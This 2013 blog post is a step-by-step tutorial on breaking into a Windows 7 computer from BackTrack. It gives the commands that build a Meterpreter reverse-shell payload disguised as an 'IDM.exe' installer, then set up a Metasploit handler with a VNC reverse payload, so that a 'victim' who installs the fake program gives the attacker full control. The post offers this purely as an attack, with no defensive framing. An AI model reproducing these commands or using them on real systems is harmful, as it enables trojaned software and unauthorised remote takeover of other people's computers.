Sunday 16 June 2013

How to hack windows 7 by backtrack

Now just log on your mind and read this tutorial carefully 


1. Open the terminal of the Backtrack

                                               
                                                   Click to enlarge the image



2. Write the following command "msfpayload windows/meterpreter/reverse_tcp lhost=backtrack IP address lport=4444  x  >  /root/Desktop/IDM.exe"

                                                         
                                                        Click to enlarge the image




 AND WAIT FOR A MINUTE...



After the Successful completion of your IDM.exe 




3. Again Open another terminal and write 'msfconsole' 



4. Then write the command -- "use exploit/multi/handler" and press enter.




5. Then you have to set a payload by writing the command -- "set payload windows/vncinject/reverse_tcp"



6. Then Set the LHOST (LOCAL HOST) -- "set lhost 192.168.40.128 (Backtrack IP address)



7. Then Just set for the exploit -- "exploit"



Now as soon as The VICTIM download your IDM file from the INTERNET 





 and tried to install 













Now you have full access of victim computer's access






1 comment:

*****************************Thanks for Your kind Visit****************************

Receive All Free Updates Via Facebook.